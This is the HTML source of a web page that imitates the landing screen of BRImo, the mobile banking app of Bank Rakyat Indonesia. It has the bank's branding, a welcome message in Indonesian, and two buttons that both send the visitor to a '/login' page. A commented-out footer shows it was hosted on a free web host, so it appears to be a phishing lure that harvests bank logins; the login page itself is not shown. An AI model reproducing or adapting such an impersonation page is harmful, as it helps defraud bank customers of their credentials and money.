<!doctype html>
<html lang="en">
 
<head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
    <link rel="canonical" href="" />
 
    <link rel="icon" href="" />
    <link rel="image_src" href="" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="PT.Bank Rakyat Indonesia (Persero) Tbk" />
    <meta name="twitter:title" content="PT.Bank Rakyat Indonesia (Persero) Tbk" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <meta property="og:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta name="twitter:description" content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta property="og:image" content="" />
    <meta name="twitter:image:src" content="" />
    <meta property="og:url" content="" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    <title>BRImo || Bank Bri</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
 
        body {
            font-family: 'Open Sans', sans-serif;
        }
 
        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }
 
        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -40px;
            color: #000;
        }
 
        .btn-punya {
            display: block;
            margin: 90px auto 0 auto;
            padding: 0px;
            cursor: pointer;
            background: none rgb(0, 110, 200);
            border: none;
            text-align: center;
            height: 48px;
            width: 95%;
            max-width: 100%;
            font-family: Arial;
            font-size: 16px;
            font-weight: bold;
            color: rgb(255, 255, 255);
            letter-spacing: 1px;
            line-height: 1;
            border-radius: 5px;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            transition: background 200ms ease 0s;
        }
 
        .btn-belum {
            display: block;
            margin: 10px auto;
            padding: 0px;
            cursor: pointer;
            background: none transparent;
            border: none;
            text-align: center;
            height: 48px;
            width: 459px;
            max-width: 100%;
            font-family: Arial;
            font-size: 16px;
            font-weight: bold;
            color: rgb(0, 110, 200);
            letter-spacing: 1px;
            line-height: 1;
            border-radius: 5px;
            transition: background 200ms ease 0s;
        }
    </style>
</head>
 
<body>
    <div class="container">
        <div class="row">
            <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: -40px; margin-bottom: 105px; border-radius: 0px;">
                <br>
                <center>
                    <img alt="" src="/assets/muda.png" style="display: block; margin: -10px; width: 80%; height: 80%; border-radius: 0px; margin-top: 100px;">
                </center>
                <br>
            </div>
        </div>
        <p style="width: 90%; font-size:18px; margin-top: -10px; margin-left: 10px; text-align: left; color:#09559a; font-weight: bold;">Selamat Datang Di BRImo</p>
        <br>
        <p style="font-size:14px; margin-top: -30px; margin-left: 10px; text-align: left; color:black;">Apakah anda memiliki <b>Akun internet banking<br>Bank Bri?</b></p>
        <br>
        <br>
        <br>
        <br>
        <div class="row" style="margin-top: -260px;">
            <div class="col-12 d-block mx-auto" style="white-space: pre-wrap; width: 459px; max-width: 100%; left: 0px; top: 0px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px;">
 
            </div>
        </div>
        <div class="row">
            <div class="col-12">
                <strong><button type="button" class="btn-punya" onclick="location.href='/login';">Punya Akun</strong></button>
            </div>
            <div class="col-12">
                <strong><button type="button" class="btn-belum" onclick="location.href='/login';">Belum Punya Akun</strong></button>
            </div>
        </div>
    </div>
 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>
    <!-- <div style="text-align:right;position:fixed;z-index:9999999;bottom:0;width:auto;right:1%;cursor:pointer;line-height:0;display:block!important"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>___subtmpl1</script></body> -->
</body>
 
</html>